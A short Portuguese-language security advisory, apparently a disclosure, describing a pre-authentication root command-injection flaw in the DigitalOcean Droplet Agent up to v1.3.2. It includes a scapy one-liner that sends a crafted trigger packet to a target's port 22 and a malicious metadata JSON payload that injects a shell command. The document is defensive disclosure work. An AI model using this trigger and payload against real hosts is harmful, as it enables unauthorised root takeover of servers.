
Vulnerabilidade Crítica de RCE Pré-Autenticação (CVSS 10.0) no DigitalOcean Droplet Agent até a v1.3.2 via Injeção de Comandos.
RCE Crítico Pré-Autenticação como Root (CVSS 10.0) no DigitalOcean Droplet Agent até v1.3.2 via Injeção de Comandos.
Uma vulnerabilidade crítica de injeção de comandos foi descoberta no DigitalOcean Droplet Agent (todas as versões até e incluindo 1.3.2). Esta falha permite que um atacante alcance Execução Remota de Código (RCE) com privilégios de root sem qualquer autenticação.
Descobridor: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research
A vulnerabilidade existe no componente de ação de resolução de problemas:
internal/troubleshooting/actioner/actioner.gointernal/troubleshooting/command/exec.goO agente processa metadados do serviço local (169.254.169.254) e executa comandos do array sem sanitização adequada.
TroubleshootingAgent.RequestingO agente é acionado por um pacote TCP específico para a porta 22:
Acionar a busca:
python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"
Payload de Metadados Maliciosos:
{
"troubleshooting_agent": {
"requesting": ["command:id > /tmp/pwned"]
}
}
Impacto Pontuação CVSS: 10.0 (Crítico)
Privilégios Necessários: Nenhum
Resultado: Comprometimento Total do Sistema (Acesso Root)
